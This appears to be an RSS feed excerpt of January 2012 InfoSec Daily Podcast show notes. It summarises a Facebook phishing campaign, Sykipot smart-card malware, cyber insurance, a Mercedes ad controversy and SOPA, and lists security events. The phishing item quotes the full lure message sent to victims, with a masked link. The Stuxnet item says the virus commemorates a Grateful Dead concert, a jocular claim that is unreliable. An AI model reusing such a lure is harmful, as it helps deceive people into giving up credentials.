<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* Stuxnet virus</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">mentions Wednesday 09 May 1979 in its code</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The virus commemorates the performance on that day of the Grateful Dead in Binghamton, New York. (You can hear the audience cheer when the lyrics of the song &quot;Truckin&#39;&quot; reach </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">New York</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in the sound-clip below.)</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;. </span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.securelist.com/en/blog/208193325/Facebook_Security_Phishing_Attack_In_The_Wild"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securelist.com/en/blog/208193325/Facebook_Security_Phishing_Attack_In_The_Wild</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There is a new Facebook phishing attack going on. It will not just try to steal your Facebook credentials; it will also try to steal credit card information and other important information such as security questions.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This Facebook phishing attack is pretty interesting because it does not just try to trick the victim into visiting a phishing website. It will reuse the stolen information and login to the compromised account and change both profile picture and name. The profile picture will be changed to the Facebook logo and the name will be translated to &ldquo;Facebook Security&rdquo; but containing special ascii characters replacing letters such as &ldquo;a&rdquo; &ldquo;k&rdquo; &ldquo;S&rdquo; and &ldquo;t&rdquo;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once an account is compromised it will also send out a message to all contacts of the compromised account. The message looks like this:</span><img height="288px;" src="https://lh3.googleusercontent.com/Q3KTkBQ0CgOQi4-vCmJg1Jo837B3qWf0CJNXD2hwg8QBkZz3pXjWjil2PNk9lpJy4TdvXp4qVROQ4hYN1lGwyWqQBZLMMIlJ75VUQbjkWR3922WihBA" width="267px;" /></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Last Warning: Your Facebook account will be turned off Because someone has reported you. Please do re-confirm your account security by: =&gt; http://apps-xxxx-xxxxx-user.de.vu</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thank you. The Facebook Team&quot;/</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerworld.com/s/article/9223366/Cyber_insurance_offers_IT_peace_of_mind_or_maybe_not"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9223366/Cyber_insurance_offers_IT_peace_of_mind_or_maybe_not</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If your company were hit with a cyber attack today, would it be able to foot the bill? The </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">entire</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> bill, including costs from regulatory fines, potential lawsuits, damage to your organization&#39;s brand, and hardware and software repair, recovery and protection?</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s a question worth careful consideration, given that the price of cyber attacks is rising at an alarming rate.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The second annual</span><a href="http://www.scribd.com/doc/64020942/Annual-Ponemon-Cost-of-Cyber-Crime-Study"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Cost of Cyber Crime study</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, released last August by the</span><a href="http://www.ponemon.org/index.php"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Ponemon Institute</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, reported that the median annualized cost of detection of and recovery from cyber crime per company is $5.9 million &#8212; a 56% increase from the 2010 median figures. The costs of cyber crime range from $1.5 million to $36.5 million per company.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A growing number of insurance companies are offering cyber protection in the event of breaches and other malicious data attacks. But so far, they&#39;re having some difficulty making their case. Surveys show companies have yet to embrace these policies, whose costs can be staggering.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.techworld.com/security/3329897/chinese-attack-us-dod-smart-cards-with-sykipot-malware"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3329897/chinese-attack-us-dod-smart-cards-with-sykipot-malware</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A new strain of the Sykipot malware is being used by Chinese cyber criminals to compromise US Department of Defense (DoD) smart cards, a new report has revealed.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The malware has been designed to take advantage of smart card readers running ActivClient &ndash; the client application of ActivIdentity &ndash; according to unified security information and event management (SIEM) company AlienVault.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ActivIdentity&#39;s smart cards are standardised at the DoD and a number of other US government agencies. The cards are used to identify active duty military staff, selected reserve personnel, civilian employees, and eligible contractor staff.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As with previous Sykipot strains, the attackers use an email campaign to get specific targets to click on a link and deposit the Sykipot malware onto their machines. After identifying the computers that have card readers, the attackers install keystroke logging software to steal the PIN number that is used in concert with the smart card.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://blog.heritage.org/2012/01/11/mercedes-benz-uses-communist-madman-che-guevara-to-sell-luxury-cars/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.heritage.org/2012/01/11/mercedes-benz-uses-communist-madman-che-guevara-to-sell-luxury-cars/</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There&#39;s something about Che Guevara that convinces older European men that they will become cooler through association with his &quot;brand.&quot; We saw that again yesterday when Mercedes-Benz Chairman Dieter Zetsche launched a new car</span><a href="http://www.cbsnews.com/8301-205_162-57356428/mercedes-channels-che-guevara-for-car-tech/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">under a banner picture of Guevara</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. </span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To Mercedes-Benz&#39;s credit, it apologized 48 hours after the event. &nbsp;&quot;In his keynote speech at CES, Dr. Zetsche addressed the revolution in automobility enabled by new technologies, in particular those associated with connectivity. To illustrate this point, the company briefly used a photo of revolutionary Che Guevara (it was one of many images and videos in the presentation) &hellip;We sincerely apologize to those who took offense,&quot; the statement said.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When further pressed on the matter, Daimler spokesman Han Tjan said the image appeared for &quot;only a few seconds&quot; during the 45-minute &quot;Power Point&quot; presentation.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It was very thoughtless not to realize that by doing that, it would offend a large number of people,&quot; Tjan said.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Unfortunately, the word &lsquo;revolutionary&rsquo; triggered a picture of Che Guevara &hellip; which may indicate the age of the person who did it,&rdquo; he said. &quot;That fell between the cracks &hellip; It was absolutely stupid that somebody did it.&quot;</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I personally have questioned people that wear those Che Guevara shirts. &nbsp;This sorta sums up my opinion on those that would.</span><img height="355px;" src="https://lh3.googleusercontent.com/ivPnBVtJlNoljLg3x2UVteFsD3eWDtdWvATijR1fkEtRfl78OvTvknyQjPrWNvCqu5-WWTOXbT1CS7bKSh3t1DjmYaZBHAmLavn4cMpSq16q2gUmLT0" width="443px;" /></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.stanforddaily.com/2012/01/13/law-professors-react-to-pipa-sopa-legislation/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.stanforddaily.com/2012/01/13/law-professors-react-to-pipa-sopa-legislation/</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Congress is expected to consider two bills when it returns from recess on Jan. 24: the Preventing Real Online Threats to Economic Creativity and Theft of Intellectual Property Act (PROTECT IP Act or PIPA) and the Stop Online Piracy Act (SOPA). The legislation is of major concern to Stanford thought leaders, in addition to nationwide legal experts, online security experts, Internet activists and the founders of many of Silicon Valley&rsquo;s largest companies.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The answer is to innovate, not to pass stupid laws that are going to screw up the Internet,&rdquo; said</span><a href="http://cyberlaw.stanford.edu/profile/anthony-falzone"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Anthony Falzone</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, executive director of the Fair Use Project at the Stanford Center for Internet and Society (SCIS) at a Dec. 7 event hosted by SCIS called, &ldquo;What&rsquo;s wrong with SOPA?&rdquo; The panel convened experts on Internet infrastructure and security, digital intellectual property and Silicon Valley business to articulate many of SOPA&rsquo;s problems.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More than 150 people attended the Law School event, which was &ldquo;not meant to give equal time to both sides,&rdquo; according to Falzone. &nbsp;The audience did include two representatives from the Motion Picture Association of America, supporters of SOPA and PIPA, who spoke up during a question and answer session.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;There were things about this bill that people in Silicon Valley needed to know &ndash; that is lawyers, entrepreneurs and technology people,&rdquo; Falzone said. &ldquo;Our goal was to put together an array of people who could speak to each one of those sets of considerations.&rdquo;</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">January 18, 2012, is SOPA Blackout Day!. &nbsp;This is an attempt to show the effect that SOPA would have numerous sites if SOPA were to be passed by shutting down the site from 8 am to 8 pm Eastern Standard Time (6:30 pm &#8211; 6:30 am Indian Standard Time). &nbsp;We will be broadcasting on the 18th, but visitors to our site see a simple message about how the PIPA/SOPA legislation would shut down sites like ours.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-567-friday-13th-facebook-security-scam-cyber-insurance-sykipot-when-your-google-skills-fail-sopa-soundoff/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3368/0/infosec-daily-podcast-episode-567.mp3" length="22172670" type="audio/mpeg" />
		<itunes:duration>0:46:09</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 567 for January 13, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why d[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 567 for January 13, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Anti PIPA/SOPA Meetup
	Meetup Groups across the country are mobilizing to help stop
	SOPA and PIPA, as we will very potentially see PIPA&#39;s passage
	in the next two weeks if we don&#39;t act.
	We at Meetup HQ are alerting members of the New York Tech
	community about a chance to organize together. The NY Tech
	Meetup, New York&#39;s largest Tech Meetup, has scheduled an
	emergency Meetup on Wednesday, January 18. In order to build
	critical mass and maintain an organized event *please RSVP in
	the NY Tech Meetup* if you want to participate.
	Go here to RSVP: http://www.meetup.com/ny-tech/events/47879702/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	ht[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 566 &#8211; SCADA, MDCU, Sniffing Playbook, SSIDs, DNSSEC &amp; SOPA</title>
		<link>http://www.isdpodcast.com/episode-566-scada-mdcu-sniffing-playbook-ssids-dnssec-sopa</link>
		<comments>http://www.isdpodcast.com/episode-566-scada-mdcu-sniffing-playbook-ssids-dnssec-sopa#comments</comments>
		<pubDate>Fri, 13 Jan 2012 02:03:44 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3365</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 566 for January 12, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad. &#160; Announcements: Information Security Blogger Awards 2012 Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 566 for January 12, 201<span style="font-size:16px;">2. &nbsp;</span></span><span style="font-size:16px;"><span style="color: rgb(0, 0, 0); background-color: rgb(255, 255, 255); font-weight: bold; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad.</span></span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
